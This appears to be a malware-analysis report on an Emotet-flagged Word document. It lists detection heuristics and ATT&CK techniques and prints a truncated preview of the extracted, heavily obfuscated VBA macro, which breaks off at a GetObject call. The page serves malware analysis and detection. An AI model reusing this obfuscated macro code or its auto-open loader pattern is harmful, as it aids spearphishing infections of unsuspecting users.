MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains multiple indicators of malicious macro activity, including legacy WordBasic, Excel 4.0, and VBA macros. The presence of an 'AutoOpen' macro and a 'GetObject' call strongly suggests the execution of a malicious payload. ClamAV detection confirms this, identifying it as Emotet, a known downloader family. The VBA script, though heavily obfuscated, likely facilitates the download and execution of a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6863640-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6863640-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70870 bytes |
SHA-256: 40b62b6f01f9deaf2d6f4009f5a7617f7ea8d38f619d92116b53b899214adc29 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "r5088_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "r5_5_4_"
Function f_8_4_8()
l9887__2 = 395930977 - 162273643
l__8569_ = 549886844 + z_666_
Select Case j_24592
Case 85569512
j83_44 = Chr(990470479 * Tan(Q3_34_9))
A593__2 = m7_4489
Case 860199597
z0368534 = q6017100
X_79469 = U966_9__
Case 944143160
o76__5__ = 770592123
u6_61392 = E54371_6
End Select
I_5060_ = 103165098 - 50704701
Y4__135 = 620447581 + u965__
Select Case a_475_04
Case 951851429
l___6_3 = Chr(546306573 * Tan(i057643_))
k968_21 = P_3_29
Case 113131833
A5_69__3 = z77592_2
w5_475 = r3_426_
Case 994320986
z79931 = 968139181
Z9_478__ = c_5_86_
End Select
a3_738 = 638078003 - 497717956
B19_6__ = 260706457 + q284_4_
Select Case w_4523_
Case 994594767
l__6_64 = Chr(476391997 * Tan(u77895))
n0__822 = l798___6
Case 638472092
d_8__277 = k__4428_
Q2981771 = F_602_32
Case 45242158
i0110_5 = 603591016
Y73674 = N96_89_6
End Select
n90_22 = 908423777 - 867521863
G41_13 = 777345696 + o107__
Select Case S45361
Case 92182694
j207_48 = Chr(876181962 * Tan(V97_85))
H22__3_ = r103_17
Case 549829229
h__39587 = W__89__7
Z8490_ = Y8_4_5
Case 263538960
w767_50 = 184894078
K813_0 = G037_67
End Select
w80_97_2 = 380250506 - 427890945
Y_1__75 = 129018425 + D21681
Select Case Y894_38
Case 909597525
o_1__9_2 = Chr(714320498 * Tan(O9___7))
L_______ = r7_185_2
Case 100858227
f75553_ = G__23_
O1__86_7 = C91_65
Case 378394410
T87__1_ = 612904051
p_94__2 = C27____
End Select
l2620__ = 194144116 - 766458756
U__17_ = 984186627 + S___67
Select Case z39549
Case 299691798
k435__80 = Chr(477951625 * Tan(Q_01072_))
j3__484 = O87050
Case 364164325
u34__4_ = f9_8536
X8044_ = U_36550
Case 624673673
J_68_3 = 50904838
O_34449 = p9_887
End Select
w0__1__8 = 62983398 - 820772068
N436_046 = 829433327 + W_81_70_
Select Case P__25_
Case 210596863
z209123 = Chr(782932700 * Tan(U22__7))
k_15_39 = Z50_11
Case 276277601
l47_003 = L32_965
Z948_2_ = q662__5
Case 764778586
o45238 = 399407905
k04889 = R356113
End Select
End Function
Function P5_588__(G371_95_, G567__)
On Error Resume Next
L67774 = 20924601 - 68414285
i0448_9_ = 190493219 + X153199
Select Case C06__8_
Case 674654049
z9__1_ = Chr(816953688 * Tan(H__860_))
P79637 = P8411_
Case 441899605
t92553 = o652_1
q61787 = B84162
Case 967071346
G_34__5 = 247258934
B6_581_ = W9_63_4
End Select
q12_7_ = 31648660 - 439811119
S5_6_7 = 803478431 + w70326_
Select Case W50383
Case 889442197
Z26_99 = Chr(12514590 * Tan(j_186_))
r3__68_ = N82_07
Case 252904538
j2__13 = P12___
Q_9428 = d6844_
Case 517776381
D396_2_ = 233896711
o_2509 = l9_327_
End Select
P_8_078_ = 354880179 - 12368725
V__8_34 = 71153362 + E_8185
Select Case J02_570
Case 661255125
n72___4_ = Chr(324601484 * Tan(h_811_))
i_3___3 = a5_2765
Case 240140830
u8_91_ = v8_4__5
d06___96 = D364__7
Case 850791853
Q315440_ = 239893920
q68_9_53 = M17568
End Select
Set l32__44 = GetObject((b15858_
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.